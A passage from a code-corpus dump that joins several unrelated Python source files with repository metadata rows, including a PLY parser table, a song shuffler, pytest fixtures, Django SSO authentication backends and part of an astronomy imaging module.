('loop -> WHILE LPAREN expr RPAREN LBRACE statement_list RBRACE','loop',7,'p_loop','parse.py',66),
('statement -> fun_def','statement',1,'p_statement_fun_def','parse.py',70),
('fun_def -> FUN ID LPAREN id_list RPAREN LBRACE statement_list RBRACE','fun_def',8,'p_fun_def','parse.py',74),
('statement -> RETURN expr SEMICOLON','statement',3,'p_statement_return','parse.py',78),
('id_list -> ID','id_list',1,'p_id_list_single','parse.py',82),
('id_list -> ID COMMA id_list','id_list',3,'p_id_list_multi','parse.py',86),
('id_list -> empty','id_list',1,'p_id_list_empty','parse.py',90),
('conditional -> IF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elif conditional_else','conditional',9,'p_conditional_full','parse.py',94),
('conditional_elif -> ELIF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elif','conditional_elif',8,'p_conditional_elif','parse.py',99),
('conditional_elif -> empty','conditional_elif',1,'p_conditional_elif_empty','parse.py',103),
('conditional_else -> ELSE LBRACE statement_list RBRACE','conditional_else',4,'p_conditional_else','parse.py',107),
('conditional_else -> empty','conditional_else',1,'p_conditional_else_empty','parse.py',111),
('r_value -> expr','r_value',1,'p_r_value','parse.py',115),
('l_value -> ID','l_value',1,'p_l_value_id','parse.py',119),
('l_value -> ID fields','l_value',2,'p_l_value_record','parse.py',123),
('l_value -> PLACEHOLDER','l_value',1,'p_l_value_placeholder','parse.py',127),
('l_value -> PLACEHOLDER fields','l_value',2,'p_l_value_placeholder_record','parse.py',131),
('fields -> LBRACKET expr RBRACKET','fields',3,'p_fields_single','parse.py',134),
('fields -> LBRACKET expr RBRACKET fields','fields',4,'p_fields_multi','parse.py',138),
('expr -> alg_op','expr',1,'p_expr','parse.py',142),
('expr -> STRING','expr',1,'p_expr_string','parse.py',146),
('expr -> NUMBER','expr',1,'p_expr_number','parse.py',150),
('expr -> BOOL','expr',1,'p_expr_bool','parse.py',154),
('expr -> NULL','expr',1,'p_expr_null','parse.py',158),
('expr -> func_call','expr',1,'p_expr_func_call','parse.py',162),
('expr -> ID','expr',1,'p_expr_id','parse.py',166),
('expr -> LPAREN expr RPAREN','expr',3,'p_expr_parens','parse.py',170),
('expr -> anonymous_fun','expr',1,'p_expr_anonymous_fun','parse.py',174),
('func_call -> ID LPAREN arg_list RPAREN','func_call',4,'p_func_call','parse.py',178),
('arg_list -> empty','arg_list',1,'p_arg_list_empty','parse.py',182),
('arg_list -> expr','arg_list',1,'p_arg_list_single','parse.py',186),
('arg_list -> expr COMMA arg_list','arg_list',3,'p_arg_list_multi','parse.py',190),
('alg_op -> expr PLUS expr','alg_op',3,'p_alg_op','parse.py',197),
('alg_op -> expr MINUS expr','alg_op',3,'p_alg_op','parse.py',198),
('alg_op -> expr MULTIPLY expr','alg_op',3,'p_alg_op','parse.py',199),
('alg_op -> expr DIVIDE expr','alg_op',3,'p_alg_op','parse.py',200),
('expr -> LBRACKET arg_list RBRACKET','expr',3,'p_expr_list','parse.py',211),
('expr -> LBRACE record_list RBRACE','expr',3,'p_expr_object','parse.py',215),
('expr -> LPAREN statement_list RPAREN','expr',3,'p_expr_sequence','parse.py',219),
('record_list -> ID COLON expr','record_list',3,'p_record_list_single','parse.py',223),
('record_list -> ID COLON expr COMMA record_list','record_list',5,'p_record_list_multi','parse.py',227),
('record_list -> empty','record_list',1,'p_record_list_empty','parse.py',231),
('expr -> expr LBRACKET expr RBRACKET','expr',4,'p_expr_access','parse.py',235),
('expr -> comp_op','expr',1,'p_expr_comp_op','parse.py',239),
('expr -> PLACEHOLDER','expr',1,'p_expr_placeholder','parse.py',243),
('comp_op -> expr EQUAL EQUAL expr','comp_op',4,'p_comp_op_eq','parse.py',247),
('comp_op -> expr BANG EQUAL expr','comp_op',4,'p_comp_op_neq','parse.py',251),
('comp_op -> expr GT expr','comp_op',3,'p_comp_op_gt','parse.py',255),
('comp_op -> expr GT EQUAL expr','comp_op',4,'p_comp_op_gte','parse.py',259),
('comp_op -> expr LT expr','comp_op',3,'p_comp_op_lt','parse.py',263),
('comp_op -> expr LT EQUAL expr','comp_op',4,'p_comp_op_lte','parse.py',267),
('expr -> log_op','expr',1,'p_expr_log_op','parse.py',271),
('log_op -> expr AND expr','log_op',3,'p_log_op_and','parse.py',275),
('log_op -> expr OR expr','log_op',3,'p_log_op_or','parse.py',279),
('log_op -> NOT expr','log_op',2,'p_log_op_not','parse.py',283),
('macro_def -> MAC macro_def_arg_list LBRACE statement_list RBRACE','macro_def',5,'p_macro_def','parse.py',287),
('macro_def_arg_list -> ATOM macro_def_arg_list_rec','macro_def_arg_list',2,'p_macro_def_arg_list_start_atom','parse.py',291),
('macro_def_arg_list_rec -> PLACEHOLDER macro_def_arg_list_rec','macro_def_arg_list_rec',2,'p_macro_def_arg_list_rec_placeholder','parse.py',295),
('macro_def_arg_list_rec -> ATOM macro_def_arg_list_rec','macro_def_arg_list_rec',2,'p_macro_def_arg_list_rec_atom','parse.py',299),
('macro_def_arg_list_rec -> empty','macro_def_arg_list_rec',1,'p_macro_def_arg_list_rec_empty','parse.py',303),
('macro_call -> ATOM macro_arg_list SEMICOLON','macro_call',3,'p_macro_call_atom_start','parse.py',307),
('macro_arg_list -> ATOM macro_arg_list','macro_arg_list',2,'p_macro_call_arg_list_atom','parse.py',311),
('macro_arg_list -> expr macro_arg_list','macro_arg_list',2,'p_macro_call_arg_list_expr','parse.py',315),
('macro_arg_list -> empty','macro_arg_list',1,'p_macro_call_arg_list_empty','parse.py',319),
('anonymous_fun -> LPAREN id_list RPAREN LBRACE statement_list RBRACE','anonymous_fun',6,'p_anonymous_fun','parse.py',323),
]
| 249.691589 | 14,163 | 0.653966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,629 | 0.322978 |
e2bfcef93fc96b8dc91446c56c75aa9e0e7b89e2 | 5,253 | py | Python | hw12/myscript.py | ranstotz/ece_3822 | 0fad15070f9047a9eccdab9178e4a38cfc148987 | [
"MIT"
] | null | null | null | hw12/myscript.py | ranstotz/ece_3822 | 0fad15070f9047a9eccdab9178e4a38cfc148987 | [
"MIT"
] | null | null | null | hw12/myscript.py | ranstotz/ece_3822 | 0fad15070f9047a9eccdab9178e4a38cfc148987 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# import required modules:
#
import os
import sys
import string
import random
from random import shuffle
from pathlib2 import Path
import linecache
import time
# This class shuffles songs without repeating and keeps track of where
# it left off. See '-help' option for more details.
#
class shuffler:
    """Shuffle the files under a directory and 'play' them (print one per
    second) without repeats, reshuffling once the whole playlist has been
    played.  Progress persists across runs via two scratch files:
    ./counter.txt (1-based line number of the next song) and ./shuffle.txt
    (the current shuffled playlist, one song per line).
    """

    # Scratch files used to persist state between runs.
    COUNTER_FILE = "./counter.txt"
    SHUFFLE_FILE = "./shuffle.txt"

    def __init__(self):
        # Command-line arguments with the script name stripped; set by setter().
        self.argv_a = []

    def printArgs(self):
        """Print the arguments previously stored by setter()."""
        print("Arguments provided are: %s" % (self.argv_a,))
        return

    def setter(self, commandArgs):
        """Store the command-line arguments, excluding the script name."""
        self.argv_a = commandArgs[1:]
        return

    def check_options(self):
        """Print usage information and exit if a '-help' option was given."""
        for arg in self.argv_a:
            if arg == '-help':
                print("\nsynopsis: This class shuffles the files in the provided command line argument path, then plays each song unrepeated until all songs have been played. Then it will reshuffle the songs and continue the same process.\n")
                print("desc: see above.\n")
                print("example: provide a path /songs/. Will capture the length of files in that directory and begin the shuffle.\n")
                print("options: supports a '-help' option as shown here.\n")
                print("arguments: path to files to be shuffled and '-help'.\n")
                print("man page: none.\n")
                # Exit the program when the help option is provided.
                sys.exit()
        return

    def _read_counter(self):
        """Return the integer song counter from the scratch file."""
        with open(self.COUNTER_FILE) as fin:
            return int(fin.readline())

    def _write_counter(self, value):
        """Persist the song counter to the scratch file."""
        with open(self.COUNTER_FILE, "w") as fout:
            fout.write(str(value))

    def play(self):
        """Print one shuffled song per second forever, reshuffling (without
        repeats) each time the whole playlist has been played."""
        # Collect the file names below the path given on the command line.
        # NOTE(review): as in the original, os.walk leaves mysongs holding the
        # file list of the *last* directory visited -- confirm that is intended.
        mysongs = []
        for root, dirs, files in os.walk(self.argv_a[0]):
            mysongs = files
        if not mysongs:
            # Robustness fix: the original busy-looped forever (and crashed on
            # int('')) when the directory contained no files.
            print("No songs found in %s" % self.argv_a[0])
            return
        while True:
            # Start a fresh shuffle when there is no saved state or the saved
            # counter has run past the end of the playlist.
            # BUG FIX: the original compared the counter to len(mysongs) as
            # *strings* (e.g. "9" >= "10" is True lexicographically), so the
            # reset fired at the wrong time once the playlist reached 10+ songs.
            if not os.path.isfile(self.COUNTER_FILE) \
                    or self._read_counter() > len(mysongs):
                self._write_counter(1)
                # BUG FIX: the original rewrote/reshuffled shuffle.txt on every
                # pass of the outer loop, which could repeat songs when
                # resuming mid-playlist; now it only happens on a reset.
                playlist = list(mysongs)
                random.shuffle(playlist)
                with open(self.SHUFFLE_FILE, "w") as fout:
                    for song in playlist:
                        fout.write("%s\n" % song)
                # The file changed on disk (and is now flushed/closed, unlike
                # the original); drop linecache's stale cached copy.
                linecache.checkcache(self.SHUFFLE_FILE)
            # Play (print) songs until the counter runs off the playlist.
            while True:
                current = self._read_counter()
                if current > len(mysongs):
                    break
                print(current)
                # Line `current` of the shuffle file is the current song.
                print(linecache.getline(self.SHUFFLE_FILE, current))
                self._write_counter(current + 1)
                # Print one song per second.
                time.sleep(1)
# main: this is the main function of this Python script
#
def main(argv):
    """Drive the shuffler: configure it from argv, honor '-help', then play."""
    player = shuffler()
    # Hand the raw command line (script name included) to the instance.
    player.setter(argv)
    # '-help' prints usage and exits the process before anything else runs.
    player.check_options()
    player.printArgs()
    # Enter the endless shuffle/print loop.
    player.play()
    return
# begin gracefully
#
# Script entry point: forward the full argv (script name included) to main().
if __name__ == "__main__":
    main(sys.argv[0:])
#
# end of file
| 30.540698 | 241 | 0.524843 | 4,304 | 0.819341 | 0 | 0 | 0 | 0 | 0 | 0 | 2,354 | 0.448125 |
e2c30ee2c5287f6ba3a00a3c1a67dd19f25a94b6 | 3,151 | py | Python | tests/conftest.py | RonnyPfannschmidt/python-step-series | 1ecdcac521e951a9c8615ee45bbbb73eae4c6c1f | [
"MIT"
] | null | null | null | tests/conftest.py | RonnyPfannschmidt/python-step-series | 1ecdcac521e951a9c8615ee45bbbb73eae4c6c1f | [
"MIT"
] | null | null | null | tests/conftest.py | RonnyPfannschmidt/python-step-series | 1ecdcac521e951a9c8615ee45bbbb73eae4c6c1f | [
"MIT"
] | null | null | null | """conftest.py for stepseries."""
from threading import Event
from typing import Dict, Tuple
import pytest
from stepseries.responses import DestIP
from stepseries.step400 import STEP400
# store history of failures per test class name and per index in parametrize (if parametrize used)
# maps str(test class) -> {parametrize index tuple -> name of the first failing test}
_test_failed_incremental: Dict[str, Dict[Tuple[int, ...], str]] = {}
def pytest_runtest_makereport(item, call):
    """Record the first failure inside a class marked ``incremental``."""
    if "incremental" not in item.keywords:
        return
    # only genuine failures count; skipped tests are ignored
    if call.excinfo is None or call.excinfo.typename == "Skipped":
        return
    cls_name = str(item.cls)
    # index into the parametrize matrix; empty tuple when not parametrized
    if hasattr(item, "callspec"):
        parametrize_index = tuple(item.callspec.indices.values())
    else:
        parametrize_index = ()
    test_name = item.originalname or item.name
    # remember only the FIRST failing test per (class, parametrize index)
    _test_failed_incremental.setdefault(cls_name, {}).setdefault(
        parametrize_index, test_name
    )
def pytest_runtest_setup(item):
    """Xfail a test when an earlier test of its ``incremental`` class failed."""
    if "incremental" not in item.keywords:
        return
    cls_name = str(item.cls)
    failures_for_class = _test_failed_incremental.get(cls_name)
    if failures_for_class is None:
        # no previous failure recorded for this class
        return
    # index into the parametrize matrix; empty tuple when not parametrized
    if hasattr(item, "callspec"):
        parametrize_index = tuple(item.callspec.indices.values())
    else:
        parametrize_index = ()
    # name of the first test that failed for this class name and index
    test_name = failures_for_class.get(parametrize_index, None)
    if test_name is not None:
        pytest.xfail("previous test failed ({})".format(test_name))
@pytest.mark.incremental
class HardwareIncremental:
    """Base class for hardware test suites run with the ``incremental`` marker."""
    pass
# set once the device answers with a DestIP response (see callback below)
_dest_ip_success = Event()
def callback(_: DestIP) -> None:
    """Mark the device as reachable once a ``DestIP`` response arrives."""
    _dest_ip_success.set()
@pytest.fixture(scope="session")
def device() -> STEP400:
    """Session-wide STEP400 controller with the DestIP callback attached."""
    controller = STEP400(
        0,               # dip switch id
        "10.1.21.56",    # local ip address
        50000,           # local port
        "0.0.0.0",       # server ip address
        50100,           # server port
    )
    controller.on(DestIP, callback)
    return controller
@pytest.fixture
def dest_ip_success() -> Event:
    """Event that is set once the device has reported its destination IP."""
    return _dest_ip_success
@pytest.fixture
def device_connected() -> bool:
    """``True`` when the hardware has answered (DestIP event was set)."""
    return _dest_ip_success.is_set()
@pytest.fixture(autouse=True)
def skip_if_disconnected(request, device_connected: bool) -> None:
    """Skip ``skip_disconnected``-marked tests when no hardware answered."""
    marked = request.node.get_closest_marker("skip_disconnected") is not None
    if marked and not device_connected:
        pytest.skip("hardware not detected")
| 31.828283 | 98 | 0.653443 | 35 | 0.011108 | 0 | 0 | 817 | 0.259283 | 0 | 0 | 914 | 0.290067 |
e2c3370cf74c6e03caab93b859710a1f281a0702 | 1,334 | py | Python | scripts/run_servers.py | jeeberhardt/visualize | 9ecc01d0b46a7aaa3a6459c567ba770704a71ec4 | [
"MIT"
] | 4 | 2017-11-09T09:24:02.000Z | 2019-06-05T19:44:30.000Z | scripts/run_servers.py | jeeberhardt/visualize | 9ecc01d0b46a7aaa3a6459c567ba770704a71ec4 | [
"MIT"
] | null | null | null | scripts/run_servers.py | jeeberhardt/visualize | 9ecc01d0b46a7aaa3a6459c567ba770704a71ec4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Start Pymol and Bokeh server """
from __future__ import print_function
import time
import shlex
import subprocess
__author__ = "Jérôme Eberhardt"
__copyright__ = "Copyright 2016, Jérôme Eberhardt"
__lience__ = "MIT"
__maintainer__ = "Jérôme Eberhardt"
__email__ = "qksoneo@gmail.com"
def execute_command(cmd_line):
    """Run *cmd_line* in a subprocess and return its (stdout, stderr) bytes."""
    argv = shlex.split(cmd_line)
    process = subprocess.Popen(argv, stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    return stdout, stderr
def start_screen_command(cmd, session_name):
    """Launch *cmd* inside a detached GNU screen session named *session_name*."""
    return execute_command("screen -d -m -S {0} {1}".format(session_name, cmd))
def stop_screen_command(session_name):
    """Terminate the GNU screen session named *session_name*."""
    return execute_command("screen -S {0} -X quit".format(session_name))
def main():
    """Start the Bokeh server and PyMOL in screen sessions and keep them up."""
    try:
        # Start Bokeh server and PyMOL
        start_screen_command("bokeh serve", "visu_bokeh")
        start_screen_command("pymol -R", "visu_pymol")
        # Block forever; both servers live on in their own screen sessions
        while True:
            time.sleep(3600)
    except KeyboardInterrupt:
        # Ctrl-C ends the watch loop cleanly
        pass
    finally:
        # Kill all screen sessions on the way out
        stop_screen_command("visu_bokeh")
        stop_screen_command("visu_pymol")
if __name__ == "__main__":
    # start the servers only when executed as a script
    main()
| 23.403509 | 78 | 0.678411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 415 | 0.309701 |
e2c47367897a4e2e747c0d19c8cea05565be28a7 | 6,113 | py | Python | django_sso_app/core/authentication/backends/app.py | paiuolo/django-sso-app | 75b96c669dc0b176dc77e08f018a3e97d259f636 | [
"MIT"
] | 1 | 2021-11-16T15:16:08.000Z | 2021-11-16T15:16:08.000Z | django_sso_app/core/authentication/backends/app.py | paiuolo/django-sso-app | 75b96c669dc0b176dc77e08f018a3e97d259f636 | [
"MIT"
] | null | null | null | django_sso_app/core/authentication/backends/app.py | paiuolo/django-sso-app | 75b96c669dc0b176dc77e08f018a3e97d259f636 | [
"MIT"
] | null | null | null | import logging
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth import get_user_model
from django.contrib.auth.backends import ModelBackend
from ...apps.users.utils import fetch_remote_user, create_local_user_from_remote_backend, \
update_local_user_from_remote_backend, create_local_user_from_jwt, \
create_local_user_from_apigateway_headers
from ...apps.profiles.models import Profile
from ... import app_settings
logger = logging.getLogger('django_sso_app')
User = get_user_model()
class DjangoSsoAppAppBaseAuthenticationBackend(ModelBackend):
    """Shared replicate/update logic for the SSO app authentication backends."""

    def try_replicate_user(self, request, sso_id, encoded_jwt, decoded_jwt):
        """Create a local user for *sso_id* from the remote SSO backend.

        Returns the new user, or ``None`` when profile replication is
        disabled (subclasses then fall back to their own strategy).
        """
        logger.debug('try_replicate_user')
        if not app_settings.REPLICATE_PROFILE:
            return None
        logger.info('Replicate user with sso_id "{}" from remote backend'.format(sso_id))
        # create local profile from the remote SSO user object
        backend_user = fetch_remote_user(sso_id=sso_id, encoded_jwt=encoded_jwt)
        return create_local_user_from_remote_backend(backend_user)

    def try_update_user(self, sso_id, user, user_profile, encoded_jwt, decoded_jwt):
        """Refresh *user* from the remote backend when the JWT carries a newer
        ``sso_rev`` than the local profile; otherwise leave it untouched.

        Returns the (possibly replaced) user instance.
        """
        logger.debug('try_update_user')
        rev_changed = user_profile.sso_rev < decoded_jwt['sso_rev']
        # BUGFIX: the original nested a second, redundant `if rev_changed:`
        # inside this branch; collapsed to a single check.
        if rev_changed:
            logger.info('Rev changed from "{}" to "{}" for user "{}", updating ...'
                        .format(user_profile.sso_rev, decoded_jwt['sso_rev'],
                                user))
            # local profile updated from django_sso_app instance, do not update sso_rev
            setattr(user, '__dssoa__creating', True)
            remote_user_object = fetch_remote_user(sso_id=sso_id, encoded_jwt=encoded_jwt)
            user = update_local_user_from_remote_backend(user, remote_user_object)
            logger.info('{} updated with latest data from BACKEND'.format(user))
            setattr(user, '__dssoa__creating', False)
        else:
            logger.info('Nothing changed for user "{}"'.format(user))
        return user
class DjangoSsoAppApiGatewayAppAuthenticationBackend(DjangoSsoAppAppBaseAuthenticationBackend):
    """
    Authenticates by request CONSUMER_CUSTOM_ID header
    """

    def try_replicate_user(self, request, sso_id, encoded_jwt, decoded_jwt):
        # defer to the base implementation (remote backend replication) first
        replicated = super(DjangoSsoAppApiGatewayAppAuthenticationBackend,
                           self).try_replicate_user(request, sso_id,
                                                    encoded_jwt, decoded_jwt)
        if replicated is not None:
            return replicated
        # replication disabled: build the user from the API gateway headers
        logger.info('Creating user from headers')
        return create_local_user_from_apigateway_headers(request)

    def app_authenticate(self, request, consumer_custom_id, encoded_jwt, decoded_jwt):
        """Authenticate the consumer id set by the API gateway.

        Returns the local user, ``None`` when an update is required but no
        decoded JWT is available, and re-raises replication errors.
        """
        logger.info('APP authenticating by apigateway consumer {}'.format(consumer_custom_id))
        sso_id = consumer_custom_id
        try:
            profile = Profile.objects.get(sso_id=sso_id)
        except ObjectDoesNotExist:
            # unknown profile: replicate it (from backend or from headers)
            logger.info('No profile with id "{}"'.format(sso_id))
            try:
                return self.try_replicate_user(request, sso_id, encoded_jwt, decoded_jwt)
            except Exception as e:
                logger.exception('Can not replicate user: {}'.format(e))
                raise
        user = profile.user
        if app_settings.REPLICATE_PROFILE:
            logger.debug('Should replicate profile')
            if decoded_jwt is None:
                # cannot compare revisions without the JWT payload
                logger.warning('decoded_jwt not set')
                return None
            user = self.try_update_user(sso_id, user, profile, encoded_jwt, decoded_jwt)
        return user
class DjangoSsoAppJwtAppAuthenticationBackend(DjangoSsoAppAppBaseAuthenticationBackend):
    """
    Authenticates by request jwt
    """

    def try_replicate_user(self, request, sso_id, encoded_jwt, decoded_jwt):
        """Replicate from the remote backend, falling back to creating the
        local user straight from the JWT payload when replication is disabled."""
        user = super(DjangoSsoAppJwtAppAuthenticationBackend,
                     self).try_replicate_user(request, sso_id,
                                              encoded_jwt, decoded_jwt)
        if user is None:
            # create local profile from jwt
            logger.info('Replicating user with sso_id "{}" from JWT'.format(sso_id))
            user = create_local_user_from_jwt(decoded_jwt)
        return user

    def app_authenticate(self, request, encoded_jwt, decoded_jwt):
        """Authenticate by the JWT carried on the request.

        Returns the local user, or ``None`` when no JWT is present.
        Replication failures are logged and re-raised; a JWT without
        ``sso_id`` propagates ``KeyError``.
        """
        logger.info('backend authenticating by request jwt')
        if encoded_jwt is None or decoded_jwt is None:
            logger.debug('request jwt not set, skipping authentication')
            return
        sso_id = decoded_jwt['sso_id']
        try:
            profile = Profile.objects.get(sso_id=sso_id)
            user = profile.user
            if app_settings.REPLICATE_PROFILE:
                logger.debug('try_update_user "{}" jwt consumer "{}"'.format(sso_id, sso_id))
                user = self.try_update_user(sso_id, user, profile, encoded_jwt, decoded_jwt)
            else:
                # just updates user groups
                logger.debug('Do not replicate profile')
        except ObjectDoesNotExist:
            try:
                user = self.try_replicate_user(request, sso_id, encoded_jwt, decoded_jwt)
            except Exception:
                logger.exception('Can not replicate remote user')
                raise
        # BUGFIX: the original added a try/else clause that called
        # try_update_user a second time on every successful lookup and
        # contained a bare `raise` with no active exception (RuntimeError);
        # the update already happens once inside the try block above, so the
        # redundant clause was removed.
        return user
| 35.33526 | 120 | 0.625879 | 5,524 | 0.903648 | 0 | 0 | 0 | 0 | 0 | 0 | 1,161 | 0.189923 |
e2c4e8315ad036c2df5dd6cac8f7608bc7be1a30 | 768 | py | Python | tds_django/creation.py | cnanyi/tds-django | 45f32b064de1403a138f67fe944270d228988ec9 | [
"BSD-3-Clause"
] | 1 | 2021-11-23T04:23:43.000Z | 2021-11-23T04:23:43.000Z | tds_django/creation.py | cnanyi/tds-django | 45f32b064de1403a138f67fe944270d228988ec9 | [
"BSD-3-Clause"
] | 1 | 2022-01-14T09:21:04.000Z | 2022-01-25T18:06:35.000Z | tds_django/creation.py | cnanyi/tds-django | 45f32b064de1403a138f67fe944270d228988ec9 | [
"BSD-3-Clause"
] | 1 | 2021-11-23T04:24:00.000Z | 2021-11-23T04:24:00.000Z | from django.db.backends.base.creation import BaseDatabaseCreation
class DatabaseCreation(BaseDatabaseCreation):
def create_test_db(self, *args, **kwargs):
import os
db_name = super().create_test_db()
here = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
with self.connection.cursor() as cursor:
for f in ['init.sql', 'clr.sql']:
with open(f'{here}/sql/{f}', 'r') as file:
sql = file.read()
for s in sql.split('\nGO\n'):
cursor.execute(s)
return db_name
def sql_table_creation_suffix(self):
""" a lot of tests expect case sensitivity """
return 'COLLATE Latin1_General_100_CS_AS_SC '
| 34.909091 | 85 | 0.59375 | 699 | 0.910156 | 0 | 0 | 0 | 0 | 0 | 0 | 131 | 0.170573 |
e2c75223c441e931f761b5c72b816629ae0fb22c | 656 | py | Python | mbrl-tools/tests/small_acrobot/submissions/dummy_kit/generative_regressor.py | ramp-kits/rl_simulator | c651904b890c7e97cbb29ffae82e00a76788c88c | [
"BSD-3-Clause"
] | 11 | 2021-03-24T08:57:58.000Z | 2022-03-23T14:25:17.000Z | mbrl-tools/tests/small_acrobot/submissions/dummy_kit/generative_regressor.py | ramp-kits/rl_simulator | c651904b890c7e97cbb29ffae82e00a76788c88c | [
"BSD-3-Clause"
] | 1 | 2020-10-23T17:13:57.000Z | 2021-03-23T17:46:24.000Z | mbrl-tools/tests/small_acrobot/submissions/dummy_kit/generative_regressor.py | ramp-kits/rl_simulator | c651904b890c7e97cbb29ffae82e00a76788c88c | [
"BSD-3-Clause"
] | 1 | 2021-06-17T01:18:31.000Z | 2021-06-17T01:18:31.000Z | import numpy as np
from rampwf.utils import BaseGenerativeRegressor
class GenerativeRegressor(BaseGenerativeRegressor):
def __init__(self, max_dists, target_dim):
self.decomposition = 'autoregressive'
def fit(self, X_array, y_array):
pass
def predict(self, X_array):
# constant prediction with value equal to 10
n_samples = X_array.shape[0]
types = ['norm']
means = np.full(shape=(n_samples, 1), fill_value=10)
sigmas = np.zeros((n_samples, 1))
params = np.concatenate((means, sigmas), axis=1)
weights = np.ones((n_samples, 1))
return weights, types, params
| 28.521739 | 60 | 0.655488 | 584 | 0.890244 | 0 | 0 | 0 | 0 | 0 | 0 | 66 | 0.10061 |
e2c7ac772ba67bc802ebf29dae748fc6d17103e6 | 29,982 | py | Python | fluxcompensator/image.py | koepferl/FluxCompensator | 751cac08971845069da8c962bc83459f091ba0f8 | [
"BSD-2-Clause"
] | 9 | 2017-06-22T15:29:01.000Z | 2021-03-24T11:55:41.000Z | fluxcompensator/image.py | koepferl/FluxCompensator | 751cac08971845069da8c962bc83459f091ba0f8 | [
"BSD-2-Clause"
] | 1 | 2020-06-16T21:01:51.000Z | 2020-06-16T21:01:51.000Z | fluxcompensator/image.py | koepferl/FluxCompensator | 751cac08971845069da8c962bc83459f091ba0f8 | [
"BSD-2-Clause"
] | 5 | 2017-06-22T14:57:24.000Z | 2020-06-14T16:46:44.000Z | from copy import deepcopy
import os
ROOT = os.path.dirname(os.path.abspath(__file__)) + '/'
import numpy as np
from numpy.random import normal
from astropy import log as logger
from astropy.io import fits
from astropy.wcs import WCS
from .psf import GaussianPSF, FilePSF, FunctionPSF
from .utils.plot import MakePlots
from .utils.resolution import ConservingZoom, central
from .utils.tools import properties, grid_units, get_slices, average_collapse, central_wav
from .utils.units import ConvertUnits
class SyntheticImage(object):
'''
SyntheticImage is part the FluxCompensator. It converts
input_arrays (e. g. HYPERION ModelOutput in 2D) to "realistic" synthetic observations
(e. g. by accounting for PSF and noise).
It contains attributes like ModelOutput (see Notes).
If input_array is already a SyntheticImage object, the attributes are
passed. If input_array is not a SyntheticImage object, SyntheticImage
specific attributes are defined and then passed.
Parameters
----------
input_array : SyntheticImage, ModelOutput, optional
input_array also reads arrays with ModelOutput like properties.
unit_out : str, optional
The output units for SyntheticImage val. Valid options are:
* ``'ergs/cm^2/s'``
* ``'ergs/cm^2/s/Hz'``
* ``'Jy'``
* ``'mJy'``
* ``'MJy/sr'``
The default is ``'ergs/cm^2/s'``.
name : str
The name of the FluxCompensator object until another
input_array is called. The default is ``None``.
Attributes
----------
wav : numpy.ndarray
The wavelength of the val image in microns.
val : numpy.ndarray
The 2D image with shape (x, y).
units : str
Current units of the val image.
distance : str
Distance to the observed object in cm.
x_min : float
Physical offset from axis origin in FOV in cm.
x_max : float
Physical offset from axis origin in FOV in cm.
y_min : float
Physical offset from axis origin in FOV in cm.
y_max : float
Physical offset from axis origin in FOV in cm.
lon_min : float
Minimal longitudinal angle.
lon_max : float
Maximal longitudinal angle.
lat_min : float
Minimal latitudinal angle.
lat_max : float
Maximal latitudinal angle.
pix_area_sr : float
Pixel area per sr.
Notes
-----
unit_in : str
Unit of val in input_array. Valid options are:
* ``'ergs/cm^2/s'``
* ``'ergs/cm^2/s/Hz'``
* ``'Jy'``
* ``'mJy'``
* ``'MJy/sr'``
grid_unit : float
Physical unit of FOV axis in cm. Valid options are:
* ``au`` in cm
* ``pc`` in cm
* ``kpc`` in cm
grid_unit_name
Astronomical unit of FOV axis. Valid options are:
* ``'au'``
* ``'pc'``
* ``'kpc'``
FOV : tuple
Tuple ``FOV(x,y)`` of Field of View pixel entries:
* pixel in x direction: ``FOV[0]``
* pixel in y direction: ``FOV[1]``
name : str
The name of the FluxCompensator object until another
input_array is called. The default is ``None``.
stage : str
Gives current operation stage of SyntheticImage.
E. g. ``'SyntheticImage: convolve_PSF'``
log : list
List of strings of the previous and current stages.
filter : dict
Dictionary filter = ``{name, waf_0, waf_min, waf_max}``
of the applied filter:
* name of filter: ``filter['name']``
* central wavelength: ``filter['waf_0']``
* minimal wavelength: ``filter['waf_min']``
* maximal wavelength: ``filter['waf_max']``
Returns
-------
image : SyntheticImage
2D val array with SyntheticImage properties.
flux : SyntheticFlux
0D val array (scalar) with SyntheticFlux properties.
'''
    def __init__(self, input_array, unit_out='ergs/cm^2/s', name=None):
        """Copy the ModelOutput-like attributes of *input_array* and convert
        the image values to ``unit_out`` (see class docstring for options)."""
        # Hyperion ModelOutput attributes
        # NOTE(review): earlier support for collapsing (x, y, 1) cubes was
        # commented out here; only the plain 2D copy remains.
        self.val = np.array(deepcopy(input_array.val))
        self.wav = np.array(deepcopy(input_array.wav))
        self.units = input_array.units
        self.distance = input_array.distance
        # physical offsets of the field of view in cm
        self.x_max = input_array.x_max
        self.x_min = input_array.x_min
        self.y_max = input_array.y_max
        self.y_min = input_array.y_min
        # angular extent of the field of view
        self.lon_min = input_array.lon_min
        self.lon_max = input_array.lon_max
        self.lat_min = input_array.lat_min
        self.lat_max = input_array.lat_max
        self.pix_area_sr = input_array.pix_area_sr
        ##################
        # new attributes #
        ##################
        # local import avoids the circular dependency cube <-> image
        from .cube import SyntheticCube
        if isinstance(input_array, SyntheticImage) or isinstance(input_array, SyntheticCube):
            # attributes are passed through, since input_array is already a
            # SyntheticCube or SyntheticImage
            # physical values
            self.unit_in = input_array.unit_in
            self.unit_out = input_array.unit_out
            self.grid_unit = input_array.grid_unit
            self.grid_unit_name = input_array.grid_unit_name
            # properties of image
            self.FOV = deepcopy(input_array.FOV)
            # name
            self.name = input_array.name
            self.stage = input_array.stage
            self.log = deepcopy(input_array.log)
            # filter
            self.filter = deepcopy(input_array.filter)
        else: # attributes are defined, since input_array is NOT SyntheticCube or Image
            # physical values
            self.unit_in = input_array.units
            self.unit_out = unit_out
            # pick a human-friendly axis unit (au / pc / kpc) from the FOV size
            self.grid_unit = grid_units(self.x_max - self.x_min)['grid_unit']
            self.grid_unit_name = grid_units(self.x_max - self.x_min)['grid_unit_name']
            self.FOV = (self.x_max - self.x_min, self.y_max - self.y_min)
            # name
            self.name = name
            self.stage = 'SyntheticImage: initial'
            self.log = [self.stage]
            # filter
            self.filter = {'name': None, 'waf_0': None, 'waf_min': None, 'waf_max': None}
        # convert val from unit_in into unit_out
